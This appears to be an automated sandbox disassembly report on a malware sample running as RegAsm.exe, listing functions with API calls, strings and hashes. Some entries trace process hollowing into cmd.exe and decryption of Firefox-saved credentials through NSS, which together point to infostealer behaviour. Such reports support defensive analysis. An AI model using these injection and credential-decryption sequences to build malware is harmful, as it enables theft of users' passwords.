Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$Findlstrlen$FileHeap_memsetwsprintf$AllocCloseFirstNextProcessSystemTime
String ID: %s\%s$%s\*$K_A
API String ID: 2347508687-1624741228
Opcode ID: 2d45aad56b69257e22c84493828d34e31e8b8a1878497380ca564db6f63f63f9
Instruction ID: f1f80ab8573884d5547ab2b117a2a7bfd804ed3709ed9bfee1ddc7f274e11282
Opcode Fuzzy Hash: 2d45aad56b69257e22c84493828d34e31e8b8a1878497380ca564db6f63f63f9
Instruction Fuzzy Hash: 6F713EB19002289BDF20EF60DD49ACD77B9AF49315F0004EAA609B3151EB76AFC5CF59

Function 0041C472 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 440COMMON

Download Yara Rule

Strings

UT, xrefs: 0041C79D
/, xrefs: 0041C525

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: /$UT
API String ID: 0-1626504983
Opcode ID: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
Instruction ID: 63eef66cd8fe0e336db70064ed11a5ad7b696d25642cb4984019eb1642be8bef
Opcode Fuzzy Hash: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
Instruction Fuzzy Hash: 8E027DB19442698BDF21DF64CC807EEBBB5AF45304F0440EAD948AB242D7389EC5CF99

Function 6C03ED10 Relevance: 25.4, APIs: 16, Instructions: 5407COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C03EE7A
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C03EFB5
memcpy.VCRUNTIME140(?,?,?,?), ref: 6C041695
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0416B4
memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C041770
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C041A3E

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: memset$freemallocmemcpy
String ID:
API String ID: 3693777188-0
Opcode ID: 65578e4ca905f94da55ad5695e38facd27fb02acd0f7b3608ccf4bc73713336b
Instruction ID: 4c046712a2253f1b247d59a43965c99b5ea4108ef3338161120604c830cd2bc5
Opcode Fuzzy Hash: 65578e4ca905f94da55ad5695e38facd27fb02acd0f7b3608ccf4bc73713336b
Instruction Fuzzy Hash: 12B31871E0422ACFCB14CFA8C890B9DB7F2BF49304F5582A9D559AB745D730A986CF90

Function 0040F54A Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 130threadinjectionmemoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040F57C
CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,004365A7,00000000,00000000,00000001,00000004,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040F5A0
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0040F5B2
GetThreadContext.KERNEL32(?,00000000), ref: 0040F5C4
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040F5E2
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0040F5F8
ResumeThread.KERNEL32(?), ref: 0040F608
WriteProcessMemory.KERNEL32(?,00000000,a-A,?,00000000), ref: 0040F627
WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0040F65D
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040F684
SetThreadContext.KERNEL32(?,00000000), ref: 0040F696
ResumeThread.KERNEL32(?), ref: 0040F69F

Strings

C:\Windows\System32\cmd.exe, xrefs: 0040F59B
a-A, xrefs: 0040F550, 0040F620

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$MemoryThread$Write$AllocContextResumeVirtual$CreateRead_memset
String ID: C:\Windows\System32\cmd.exe$a-A
API String ID: 3621800378-431432405
Opcode ID: e1ccbe8c928e2f1c21e5e7053cc7bb29076fa0b0443f7d3298dfd20d4594a4fa
Instruction ID: 0d24e25234c3a3ad141f65fc29eb95852bfeeab9a63bd67a8dcfe51b88e854c0
Opcode Fuzzy Hash: e1ccbe8c928e2f1c21e5e7053cc7bb29076fa0b0443f7d3298dfd20d4594a4fa
Instruction Fuzzy Hash: B5413872A00208AFEB11DFA4DC85FAAB7B9FF48705F144475FA01E6161E776AD448B24

Function 6C027810 Relevance: 21.4, APIs: 12, Strings: 2, Instructions: 372COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C09E744), ref: 6C027885
LeaveCriticalSection.KERNEL32(6C09E744), ref: 6C0278A5
EnterCriticalSection.KERNEL32(6C09E784), ref: 6C0278AD
LeaveCriticalSection.KERNEL32(6C09E784), ref: 6C0278CD
EnterCriticalSection.KERNEL32(6C09E7DC), ref: 6C0278D4
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C0278E9
EnterCriticalSection.KERNEL32(00000000), ref: 6C02795D
memset.VCRUNTIME140(?,00000000,00000160), ref: 6C0279BB
LeaveCriticalSection.KERNEL32(?), ref: 6C027BBC
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C027C82
LeaveCriticalSection.KERNEL32(6C09E7DC), ref: 6C027CD2
memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6C027DAF

Strings

Dl, xrefs: 6C02787F
Dl, xrefs: 6C02789F

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeavememset
String ID: Dl$Dl
API String ID: 759993129-3425896459
Opcode ID: d07b02925c0e7594878c3a43998e05015d360fc8dabb588ddf87d9adb4057008
Instruction ID: 7f358aed99bbb7d98cad890a0f54b920f53a2b45701b4a917b8c12dca79533a5
Opcode Fuzzy Hash: d07b02925c0e7594878c3a43998e05015d360fc8dabb588ddf87d9adb4057008
Instruction Fuzzy Hash: D9026F71A0121A8FDB54CF29C984799B7F5FF88318F6582AAD809A7751D734BE90CF80

Function 6C057E10 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 403COMMON

Download Yara Rule

Strings

schema, xrefs: 6C0581E3, 6C058311
data, xrefs: 6C058280, 6C0583E1
(pre-xul), xrefs: 6C057E88
vl, xrefs: 6C058207
name, xrefs: 6C057ECF, 6C058335

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: memcpystrlen
String ID: (pre-xul)$data$name$schema$vl
API String ID: 3412268980-1118149657
Opcode ID: c96acbb81cb9943c01c368a38eca038a526e10ebd124944b4a8cd6dc4df6e66e
Instruction ID: 098b9ee2802ca539a4d1e44f224ba151b5edc9e0fd37a74b05415b35f8520bab
Opcode Fuzzy Hash: c96acbb81cb9943c01c368a38eca038a526e10ebd124944b4a8cd6dc4df6e66e
Instruction Fuzzy Hash: 91E17FB1B043518BCB10CF69884075BF7E9BBC9318F148A2DE89997791DBB4ED098B91

Function 6C03D4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C09E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C04D1C5), ref: 6C03D4F2
LeaveCriticalSection.KERNEL32(6C09E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C04D1C5), ref: 6C03D50B

Part of subcall function 6C01CFE0: EnterCriticalSection.KERNEL32(6C09E784), ref: 6C01CFF6
Part of subcall function 6C01CFE0: LeaveCriticalSection.KERNEL32(6C09E784), ref: 6C01D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C04D1C5), ref: 6C03D52E
EnterCriticalSection.KERNEL32(6C09E7DC), ref: 6C03D690
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C03D6A6
LeaveCriticalSection.KERNEL32(6C09E7DC), ref: 6C03D712
LeaveCriticalSection.KERNEL32(6C09E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C04D1C5), ref: 6C03D751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C03D7EA

Strings

: (malloc) Error initializing arena, xrefs: 6C03D82C
<jemalloc>, xrefs: 6C03D827

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
Opcode ID: 3e7c1baf938fa246b2c6461d048e63a99d6b6b02b26eec4b59e33680f0939a7d
Instruction ID: 758f1262906cbd86715e38349856791cbbe5f338b514b9c34b9a2fe1dfef1bbb
Opcode Fuzzy Hash: 3e7c1baf938fa246b2c6461d048e63a99d6b6b02b26eec4b59e33680f0939a7d
Instruction Fuzzy Hash: F391C571B147128FD714CF29C49471AB7E5FB89314F14692EE5AE87A81EB30E944CB82

Function 6C074EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 6C074EFF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C074F2E
moz_xmalloc.MOZGLUE ref: 6C074F52
memset.VCRUNTIME140(00000000,00000000), ref: 6C074F62
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C0752B2
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C0752E6
Sleep.KERNEL32(00000010), ref: 6C075481
free.MOZGLUE(?), ref: 6C075498

Strings

(, xrefs: 6C075250

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: floor$Sleep$freememsetmoz_xmalloc
String ID: (
API String ID: 4104871533-3887548279
Opcode ID: 2855abbf56e968bbb0c64bb43194ef42338ea8835cbc45de54ebe3bb9cea209e
Instruction ID: cf054a5c60045def782efa565d5822bbc693dde03143493d4266d52001ce1bff
Opcode Fuzzy Hash: 2855abbf56e968bbb0c64bb43194ef42338ea8835cbc45de54ebe3bb9cea209e
Instruction Fuzzy Hash: 7AF1DF71A19B008FC716CF39C85062BB7F9BFD6294F058B2EF946A7651DB31D8428B81

Function 0040A7D8 Relevance: 15.1, APIs: 10, Instructions: 94stringencryptionCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040A815
lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A830
CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0040A838
PK11_GetInternalKeySlot.NSS3(?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A846
PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A85A
PK11SDR_Decrypt.NSS3(?,?,00000000,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A89A
_memmove.LIBCMT ref: 0040A8BB
lstrcatA.KERNEL32(00436803,00436807,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A8E5
PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A8EC
lstrcatA.KERNEL32(00436803,0043680E,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A8FB

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: K11_$Slotlstrcat$AuthenticateBinaryCryptDecryptFreeInternalString_memmove_memsetlstrlen
String ID:
API String ID: 4058207798-0
Opcode ID: a697b237291ad732cff6152e98f2904289e14e348f3c7af2acd105475d3b2c95
Instruction ID: 7253553526a9c866879b9953ce513a4e0df9f59d016b35785d070f4f95aa81eb
Opcode Fuzzy Hash: a697b237291ad732cff6152e98f2904289e14e348f3c7af2acd105475d3b2c95
Instruction Fuzzy Hash: 60315CB2D0421AAFDB10DB64DD849FAB7BCAF08345F5040BAF409E2240E7794A859F66

Function 6C055190 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 331timeCOMMON

Download Yara Rule

APIs

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C0551DF
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C05529C
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,00000000), ref: 6C0552FF
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C05536D
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C0553F7

Part of subcall function 6C04AB89: EnterCriticalSection.KERNEL32(6C09E370,?,?,?,6C0134DE,6C09F6CC,?,?,?,?,?,?,?,6C013284), ref: 6C04AB94
Part of subcall function 6C04AB89: LeaveCriticalSection.KERNEL32(6C09E370,?,6C0134DE,6C09F6CC,?,?,?,?,?,?,?,6C013284,?,?,6C0356F6), ref: 6C04ABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_RECORD_OVERHEADS), ref: 6C0556C3
__Init_thread_footer.LIBCMT ref: 6C0556E0

Strings

MOZ_PROFILER_RECORD_OVERHEADS, xrefs: 6C0556BE

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: BaseDurationPlatformSeconds@TimeUtils@mozilla@@$CriticalSection$EnterInit_thread_footerLeavegetenv
String ID: MOZ_PROFILER_RECORD_OVERHEADS
API String ID: 1227157289-345010206
Opcode ID: 1995fe0745a7264ad20fb1fcfd1b8ef8484244065a7e0799fa31ee3600342f7a
Instruction ID: f6cc13278c5e5cddf3c67cdc884f7abdb34b3b2ada2923529f4d9292f516d44a
Opcode Fuzzy Hash: 1995fe0745a7264ad20fb1fcfd1b8ef8484244065a7e0799fa31ee3600342f7a
Instruction Fuzzy Hash: 26E17B75918F45CBC712CF34885026BB7F9BF9B384F50DB0EE8AA2A950DF30A4568641

Function 0040CD37 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 298filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0040CD5C
FindFirstFileA.KERNEL32(?,?), ref: 0040CD73
StrCmpCA.SHLWAPI(?,004374EC), ref: 0040CD94
StrCmpCA.SHLWAPI(?,004374F0), ref: 0040CDAE

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

lstrlenA.KERNEL32(0040D3B5,00436872,004374F4,?,0043686F), ref: 0040CE41

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

FindNextFileA.KERNEL32(?,?), ref: 0040D23C
FindClose.KERNEL32(?), ref: 0040D250

Strings

%s\*.*, xrefs: 0040CD56

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$CloseCreatelstrcatlstrlen$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitwsprintf
String ID: %s\*.*
API String ID: 833390005-1013718255
Opcode ID: e3119fbe257bcb94e031ea0aba949192674802f0e8d62e16cea99c2e2a5aeac3
Instruction ID: 06796af3159d5870cfde4b437f7530c4b10063cc36196476c106a896cedecc2d
Opcode Fuzzy Hash: e3119fbe257bcb94e031ea0aba949192674802f0e8d62e16cea99c2e2a5aeac3
Instruction Fuzzy Hash: C6D1DA71A4112DABDF20FB25DD46ADD77B5AF44308F4100E6A908B3152DB78AFCA8F94

Function 6C077030 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 6C077046
FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6C077060
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C07707E

Part of subcall function 6C0281B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C0281DE

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C077096
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C07709C
LocalFree.KERNEL32(?), ref: 6C0770AA

Strings

(null), xrefs: 6C07706A, 6C077083
### ERROR: %s: %s, xrefs: 6C077087

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
String ID: ### ERROR: %s: %s$(null)
API String ID: 2989430195-1695379354
Opcode ID: dd1fd5082be11def35db8b136a771a2d2afcc8ddb3ab35da86e7acf8d4dba4ce
Instruction ID: ede99e9c8cea9be8cb984aaefa4c3a49aadc260eb04457a240f65371e969b28d
Opcode Fuzzy Hash: dd1fd5082be11def35db8b136a771a2d2afcc8ddb3ab35da86e7acf8d4dba4ce
Instruction Fuzzy Hash: C501BEB1A00118AFDB145F65DC4AFAF7BFCFF49215F010435F605A3241DA7169148BA1

Function 6C062C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C062C31
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C062C61

Part of subcall function 6C014DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C014E5A
Part of subcall function 6C014DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C014E97

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C062C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C062E2D

Part of subcall function 6C0281B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C0281DE

Strings

(root), xrefs: 6C06354F
expected a Time entry, xrefs: 6C062E36
ProfileBuffer parse error: %s, xrefs: 6C062E3B

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
